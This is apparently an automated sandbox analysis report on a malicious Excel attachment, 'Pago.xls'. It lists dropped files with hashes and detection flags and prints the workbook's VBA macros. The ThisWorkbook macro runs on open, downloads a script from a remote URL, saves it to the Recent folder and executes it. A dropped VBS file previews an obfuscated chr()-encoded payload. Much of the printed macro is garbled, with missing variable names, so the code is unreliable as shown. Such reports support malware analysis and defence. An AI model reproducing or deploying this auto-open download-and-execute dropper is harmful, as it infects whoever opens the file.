                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\~DFFA615887A30B4899.TMP

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                              Malicious:false
                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.4797606462020303
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyRyaSiuW3hWRUbilfln:vdsCkWta5RJhhbidl
                                              MD5:CA9570952A5F48F847628233AB5AB2D4
                                              SHA1:109750BB54BEFE801619BFE33AFE1BA2DCC152AB
                                              SHA-256:35BC7B00A750EC0D7066E16C7A8021E46EB3E4937D83FC67F47AF3AEC99135EC
                                              SHA-512:0749A18934BD44BB05B250FF0FBC8F4630B0767F650CEDFCDF8C44E6E1EE8E3F250AB254F3F622F88A61EBA6FAA7F2138F6507441ACC4057652B93C2B0C50EE9
                                              Malicious:false
                                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):395776
                                              Entropy (8bit):6.292758889650956
                                              Encrypted:false
                                              SSDEEP:6144:y3w+J2qEjOEDBOOloZON3RZDI6Yv3bK1UAnkPrI5SM3UdjnldjfzaYHapYd:yR2q0DMODN3RZDIZ3bYkPrIBEdTa6
                                              MD5:3871A95491C97785A2CBA0C068A9ED4E
                                              SHA1:B304DD40686538DEB24184729623D572DEEC57FB
                                              SHA-256:51D0B96C358A0FE55BB6A60970CEF3EFA0EC20CDAB01B4DC03DF4928D6A585BD
                                              SHA-512:1E2200B86CB9AA7467B19E31CAA148C6A8086F97AC8E326F3CEF79629BBEA50AE8070B8A6BCAC24AD55049E64DABF8C73B75284D0C14AE4EC224705E6137DF5C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....[g..............P.................. ........@.. .......................`............`.....................................O.... .......................@......d................................................ ............... ..H............text...4.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H............e......D......H...........................................*....(....*2.....(.....*.s.........s.........s.........s.........s.........*.0...........~....o........8........*....0...........~....o........8........*....0...........~....o........8........*....0...........~....o........8........*....0...........~....o........8........*....0....................9..............o....8.... ............9....~...............9....~.........(....o............9.... .........%..

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:ASCII text, with very long lines (10230), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):10232
                                              Entropy (8bit):4.211783367688683
                                              Encrypted:false
                                              SSDEEP:96:K2uOO/DTYHkGihu1BAbYm3ts/chhS3y+KdkZ91eJ/GhsSwI1taYjFCWCtcrQbAyj:ADDSTuO6hOu271OrhI1kyCccREU
                                              MD5:6990D9879DEA656A60AFCA23413F9FDF
                                              SHA1:07BF9A3E010A8B086743428049928BE6025F7441
                                              SHA-256:EF0B46E9141A7691C1C9E2F882801BB7B42758D40E6B29D894E67D5F09270724
                                              SHA-512:A1012437567F38A7CE664FDE76E6DA04B5FBC704829180B4AE0E0F5898C22D4207223D81CD6D38A3AEDE09156D384FF6A6B1C7E7D511A5E18E0977DEF4E62FAA
                                              Malicious:true
                                              Preview:Execute(chr(6225/75)& chr(154-53)& chr(10440/90)& chr(127-95)& chr(73+38)& chr(169-71)& chr(13+93)& chr(25+62)& chr(1260/12)& chr(36+74)& chr(145-73)& chr(66+50)& chr(61+55)& chr(206-94)& chr(59-27)& chr(100-39)& chr(99-67)& chr(85-18)& chr(100+14)& chr(8181/81)& chr(3298/34)& chr(4*29)& chr(185-84)& chr(43+36)& chr(4606/47)& chr(21+85)& chr(6+95)& chr(192-93)& chr(2*58)& chr(12+28)& chr(2312/68)& chr(101-14)& chr(182-77)& chr(2750/25)& chr(1944/27)& chr(10092/87)& chr(177-61)& chr(94+18)& chr(12+34)& chr(1392/16)& chr(37+68)& chr(198-88)& chr(106-34)& chr(10672/92)& chr(54+62)& chr(1008/9)& chr(10+72)& chr(71+30)& chr(147-34)& chr(28+89)& chr(4646/46)& chr(115*1)& chr(69+47)& chr(109-63)& chr(-36+89)& chr(3818/83)& chr(107-58)& chr(136/4)& chr(3+38)& chr(-33+43)& chr(12+73)& chr(21+61)& chr(4332/57)& chr(1856/58)& chr(105-44)& chr(131-99)& chr(-59+93)& chr(35+69)& chr(86+30)& chr(164-48)& chr(81+31)& chr(103+12)& chr(2726/47)& chr(2773/59)& chr(13+34)& chr(54+65)& chr(98+21)& chr(65+5

                                              C:\Users\user\Desktop\57230000

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: admin, Last Saved By: user, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Dec 6 20:43:11 2018, Last Saved Time/Date: Sat Dec 14 12:52:28 2024, Security: 0
                                              Category:dropped
                                              Size (bytes):100864
                                              Entropy (8bit):5.278104725427062
                                              Encrypted:false
                                              SSDEEP:3072:cVxEtjPOtioVjDGUU1qfDlaGGx+cL2QnA7fpQJVD+G1RSc:wxEtjPOtioVjDGUU1qfDlavx+W2QnAdB
                                              MD5:F869C2BD5E1E73C991B9BF270743B0FF
                                              SHA1:7E59BA05230AE40342294DA217780F5D62FC730A
                                              SHA-256:9FCFD37138EF309C4524D3FB73CC51031DB033C9794AFD2A0A215FCACC79B2BD
                                              SHA-512:6431DD71ED838BB162EE43A8B461EEB90B3DFC0DAE7D374D92962189DD5D055C9DA5A92F2B4D41994F0B22B6DC8C617122534EED8D377C8E80043E525D2C85AA
                                              Malicious:false
                                              Preview:......................>...................................@.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................?....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...............B...C...D...E...F...G...H.......J...c...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...I...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x.......z...

                                              C:\Users\user\Desktop\57230000:Zone.Identifier

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              C:\Users\user\Desktop\8044B4C7.tmp (copy)

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: admin, Last Saved By: oplup, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Dec 6 20:43:11 2018, Last Saved Time/Date: Sat Dec 14 09:17:33 2024, Security: 0
                                              Category:dropped
                                              Size (bytes):60416
                                              Entropy (8bit):5.694040623144282
                                              Encrypted:false
                                              SSDEEP:1536:1VxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAxPdV:1VxEtjPOtioVjDGUU1qfDlaGGx+cL2QQ
                                              MD5:61A52F73C822EF134C29BE7AEB040356
                                              SHA1:A956610F417D21DDF35198D952F2191C92EAB470
                                              SHA-256:F5A2B785F877A2C91F56B70088EE7C26CD3A74FA636C02C3289C0C7F1F4064C5
                                              SHA-512:2A1BECD6C641BD62E48081E0FB103CD4494B22AB72BA2E3112DF437E2C850EC376957B1C2950988B0A646396B9C7C81278E6BCC0BCBA7D92D6BBEDF1D94058E7
                                              Malicious:false
                                              Preview:......................>...................................?.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................>....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=.......G...^...A...B...H...D...E...F...I...W...R...J...K...L...M...N...O...P...Q...p...S...T...U...V...X...i...Y...\...[...a...]..._.......`...j...b...c...d...e...f...g...h.......m...k...l...n.......o.......q...r...s...t...........................

                                              C:\Users\user\Desktop\Pago.xls

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: admin, Last Saved By: oplup, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Dec 6 20:43:11 2018, Last Saved Time/Date: Sat Dec 14 09:17:33 2024, Security: 0
                                              Category:dropped
                                              Size (bytes):60416
                                              Entropy (8bit):5.694040623144282
                                              Encrypted:false
                                              SSDEEP:1536:1VxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAxPdV:1VxEtjPOtioVjDGUU1qfDlaGGx+cL2QQ
                                              MD5:61A52F73C822EF134C29BE7AEB040356
                                              SHA1:A956610F417D21DDF35198D952F2191C92EAB470
                                              SHA-256:F5A2B785F877A2C91F56B70088EE7C26CD3A74FA636C02C3289C0C7F1F4064C5
                                              SHA-512:2A1BECD6C641BD62E48081E0FB103CD4494B22AB72BA2E3112DF437E2C850EC376957B1C2950988B0A646396B9C7C81278E6BCC0BCBA7D92D6BBEDF1D94058E7
                                              Malicious:true
                                              Preview:......................>...................................?.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................>....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=.......G...^...A...B...H...D...E...F...I...W...R...J...K...L...M...N...O...P...Q...p...S...T...U...V...X...i...Y...\...[...a...]..._.......`...j...b...c...d...e...f...g...h.......m...k...l...n.......o.......q...r...s...t...........................

                                              Static File Info

                                              General

                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: admin, Last Saved By: oplup, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Dec 6 20:43:11 2018, Last Saved Time/Date: Sat Dec 14 09:17:33 2024, Security: 0
                                              Entropy (8bit):5.810117189295705
                                              TrID:
                                              • Microsoft Excel sheet (30009/1) 47.99%
                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                              File name:Pago.xls
                                              File size:56'832 bytes
                                              MD5:fcf8455b5da351650ed2e3c7d560d76e
                                              SHA1:e8e8b2be3a8c6bcf4a875671c468eb1dae630111
                                              SHA256:f945161c3ba134c15554ef6dab1300ce6991e341d83bae157117072660533364
                                              SHA512:7497d7297e6434d73008635ffe80fb6dfdd7b660d62c78bb7b7ceb31e0e008374a190928a1860471cb4c090666dd3ac59dfb2b48730a875c1a95f74e58fc3cd8
                                              SSDEEP:1536:5VxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAxPdoK+E:5VxEtjPOtioVjDGUU1qfDlaGGx+cL2Q/
                                              TLSH:6343F6517681C8DADA5803354DE2C6DA7B23FC51AE5B43CB3248B32F6EB16E0CC93606
                                              File Content Preview:........................>...................................?..................................................................................................................................................................................................

                                              File Icon

                                              Icon Hash:276ea3a6a6b7bfbf

                                              Static OLE Info

                                              General

                                              Document Type:OLE
                                              Number of OLE Files:1

                                              OLE File "Pago.xls"

                                              Indicators
                                              Has Summary Info:
                                              Application Name:Microsoft Excel
                                              Encrypted Document:False
                                              Contains Word Document Stream:False
                                              Contains Workbook/Book Stream:True
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:False
                                              Flash Objects Count:0
                                              Contains VBA Macros:True
                                              Summary
                                              Code Page:1252
                                              Author:admin
                                              Last Saved By:oplup
                                              Create Time:2018-12-06 20:43:11
                                              Last Saved Time:2024-12-14 09:17:33
                                              Creating Application:Microsoft Excel
                                              Security:0
                                              Document Summary
                                              Document Code Page:1252
                                              Thumbnail Scaling Desired:False
                                              Contains Dirty Links:False
                                              Shared Document:False
                                              Changed Hyperlinks:False
                                              Application Version:917504

                                              Streams with VBA

                                              VBA File Name: Module1.bas, Stream Size: 960
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Module1
                                              VBA File Name:Module1.bas
                                              Stream Size:960
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . z . . . . . . . . . . . @ a b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . 6 . . . . . . < . . . . . . . < . . . . . . . < . . . . . . . . . . . . . . x . . . . . . . . . . "
                                              Data Raw:01 16 01 00 03 f0 00 00 00 bc 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff ea 02 00 00 7a 03 00 00 00 00 00 00 01 00 00 00 40 61 c4 62 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 04 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              VBA Code
                                              Attribute VB_Name = "Module1"
Sub book()
'
End Sub

                                              VBA File Name: Sheet1.cls, Stream Size: 977
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                              VBA File Name:Sheet1.cls
                                              Stream Size:977
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ a . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 40 61 a9 ed 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              VBA Code
                                              Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                              VBA File Name: Sheet2.cls, Stream Size: 977
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                              VBA File Name:Sheet2.cls
                                              Stream Size:977
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ a . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 40 61 c4 ce 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              VBA Code
                                              Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                              VBA File Name: Sheet3.cls, Stream Size: 977
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                              VBA File Name:Sheet3.cls
                                              Stream Size:977
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ a C . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 40 61 43 05 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              VBA Code
                                              Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                              VBA File Name: ThisWorkbook.cls, Stream Size: 6651
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                              VBA File Name:ThisWorkbook.cls
                                              Stream Size:6651
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ a 3 . . # . . . . . . . . . . . . . . . . . @ . . . # . H N E n B . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . { . 3 4 S C M + . . . . . . . . . . . . . . . . . . . . . . x . . . . { . 3 4 S C M + # . H N E n B . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . 6 " . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0
                                              Data Raw:01 16 01 00 03 00 01 00 00 8c 07 00 00 e4 00 00 00 10 02 00 00 ba 07 00 00 c8 07 00 00 80 10 00 00 00 00 00 00 01 00 00 00 40 61 33 80 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 40 00 ff ff 00 00 23 a0 e8 1e ea 8c 48 4e 84 b8 45 ba fd 6e a1 42 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              VBA Code
                                              Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim WshShell As Object
Dim JUvyuihkbSpecialPathKBJKfgh As String
Dim  As Integer
 = Chr(50) + Chr(48) + Chr(48)
  

    Set WshShell = CreateObject("WScript.Shell")
    JUvyuihkbSpecialPathKBJKfgh = WshShell.SpecialFolders("Recent")
Dim 
Dim 
Dim 
Dim 
Dim 
Dim  As Integer
Dim 
Dim 
 = 1




Set  = CreateObject("microsoft.xmlhttp")
Set  = CreateObject("Shell.Application")

 = JUvyuihkbSpecialPathKBJKfgh + ("\VMV.vb")
.Open "get", ("h://www.m.m/gdhjhdjhdgj/hgdhgjwqwgwwg/vbjzbdkjbgzkldbg/hdhgjghz.vb"), False
.send
 = .responseBody
If .Status = 200 Then
Set  = CreateObject("adodb.stream")
.Open
.Type = 
.Write 
.SaveToFile ,  + 
.Close
End If
.Open ()
End Sub

Function xghxfcBropn() As Byte
xghxfcBropn = 111
Call xdfzfgxdb
Function xdfzfgxdb() As Boolean
xdfzfgxdb = False
Call Zoorroom
Function Zoorroom() As Double
Zoorroom = Zoorroom
Call hormmmom
Function hormmmom() As Variant
hormmmom = timong
Function timong() As Long
timong = fdyhjdfyfghjfhygyjfyjdfjfgyjfgjfgtujxftgh
fdyhjdfyfghjfhygyjfyjdfjfgyjfgjfgtujxftgh As Byte
fdyhjdfyfghjfhygyjfyjdfjfgyjfgjfgtujxftgh = 100
Call fthdsthdfAxgfhhd
Function fthdsthdfAxgfhhd()
fthdsthdfAxgfhhd
End Function


    Public Function ()
         = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ"
         = " @#$%^&*()_+|01456789bdghjklmqvwz.,-~AFGHJKMNQRTVWXZ?!23acefinoprstuxyBCDEILOPSUY"
        For w = 1 To Len()
             = InStr(, Mid(, w, 1))
            If  > 0 Then
                 = Mid(, , 1)
                 =  + 
            Else
                 =  + Mid(, w, 1)
            End If
        Next
         = 
    End Function

                                              Streams

                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 107
                                              General
                                              Stream Path:\x1CompObj
                                              CLSID:
                                              File Type:data
                                              Stream Size:107
                                              Entropy:4.184829500435969
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                              General
                                              Stream Path:\x5DocumentSummaryInformation
                                              CLSID:
                                              File Type:data
                                              Stream Size:244
                                              Entropy:2.9042242012830974
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208
                                              General
                                              Stream Path:\x5SummaryInformation
                                              CLSID:
                                              File Type:data
                                              Stream Size:208
                                              Entropy:3.535237808505323
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a d m i n . . . . . . . . . . . o p l u p . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . 4 M . @ . . . t . . N . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 08 00 00 00
                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 30661
                                              General
                                              Stream Path:Workbook
                                              CLSID:
                                              File Type:Applesoft BASIC program data, first line number 16
                                              Stream Size:30661
                                              Entropy:6.498992807596208
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . \\ . p . . . . o p l u p B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . Z . S C : 8 . . . . . . . X . @ . . . . . . . . . .
                                              Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 6f 70 6c 75 70 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 567
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                              CLSID:
                                              File Type:ASCII text, with CRLF line terminators
                                              Stream Size:567
                                              Entropy:5.269308213158805
                                              Base64 Encoded:True
                                              Data ASCII:I D = " { C 4 5 3 5 6 A 2 - 9 9 0 B - 4 0 8 6 - 8 8 E 3 - 9 9 E 6 0 8 9 7 A 9 8 B } " . . M o d u l e = M o d u l e 1 . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4
